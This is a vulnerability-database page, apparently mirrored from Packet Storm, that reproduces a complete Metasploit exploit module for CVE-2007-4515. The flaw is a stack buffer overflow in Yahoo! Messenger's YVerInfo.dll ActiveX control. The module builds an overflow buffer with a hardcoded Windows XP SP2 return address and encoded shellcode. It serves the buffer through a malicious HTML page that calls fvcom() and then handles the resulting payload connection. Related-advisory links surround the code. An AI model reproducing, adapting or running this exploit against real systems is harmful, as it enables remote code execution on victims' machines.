Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMCPACKETSTORM:83058
HistoryNov 26, 2009 - 12:00 a.m.

Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow

2009-11-2600:00:00
MC
packetstormsecurity.com
23

0.895 High

EPSS

Percentile

98.5%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in the Yahoo! Messenger ActiveX  
Control (YVerInfo.dll <= 2006.8.24.1). By sending a overly long string   
to the "fvCom()" method from a yahoo.com domain, an attacker may be able   
to execute arbitrary code.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'MC' ],   
'Version' => '$Revision$',  
'References' =>   
[  
[ 'CVE', '2007-4515' ],  
[ 'OSVDB', '37739' ],  
[ 'BID', '25494' ],  
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 800,  
'BadChars' => "\x00\x09\x0a\x0d'\\",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ], # Tested on fully patched XPSP2 9/29/07  
],  
'DisclosureDate' => 'Aug 30 2007',  
'DefaultTarget' => 0))  
end  
  
def autofilter  
false  
end  
  
def check_dependencies  
use_zlib  
end  
  
def on_request_uri(cli, request)  
# Re-generate the payload  
return if ((p = regenerate_payload(cli)) == nil)  
  
# Randomize some things  
vname = rand_text_alpha(rand(100) + 1)  
strname = rand_text_alpha(rand(100) + 1)  
  
# Set the exploit buffer   
sploit = rand_text_english(411) + [target.ret].pack('V')  
sploit << p.encoded + rand_text_english(payload.encoded.length)  
  
# Build out the message  
content = %Q|  
<html>  
<object classid='clsid:D5184A39-CBDF-4A4F-AC1A-7A45A852C883' id='#{vname}'></object>  
<script language='javascript'>  
#{strname} = new String('#{sploit}');  
#{vname}.fvcom(#{strname});  
</script>  
</html>  
|  
  
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")  
  
# Transmit the response to the client  
send_response_html(cli, content)  
  
# Handle the payload  
handler(cli)  
end  
  
end  
`

Related

prion 2
nessus 1
securityvulns 2
cve 2
cvelist 2
checkpoint_advisories 1
prion
prion
Buffer overflow
2007-08-31 22:17:00
Buffer overflow
2007-08-31 23:17:00
nessus
nessus
Yahoo! Messenger YVerInfo ActiveX Buffer Overflows
2007-08-30 00:00:00
securityvulns
securityvulns
Yahoo Messenger ActiveX buffer overflow
2007-08-31 00:00:00
iDefense Security Advisory 08.30.07: Yahoo Messenger YVerInfo.dll ActiveX Multiple Remote Buffer Overflow Vulnerabilities
2007-08-31 00:00:00
cve
cve
CVE-2007-4515
2007-08-31 22:17:00
CVE-2007-4635
2007-08-31 23:17:00
cvelist
cvelist
CVE-2007-4515
2007-08-31 22:00:00
CVE-2007-4635
2022-10-03 16:14:33
checkpoint_advisories
checkpoint_advisories
Yahoo! Messenger ActiveX Control YVerInfo.dll Buffer Overflow (CVE-2007-4515)
2007-10-06 00:00:00

0.895 High

EPSS

Percentile

98.5%

JSON
Related for PACKETSTORM:83058
prion2nessus1securityvulns2cve2cvelist2checkpoint_advisories1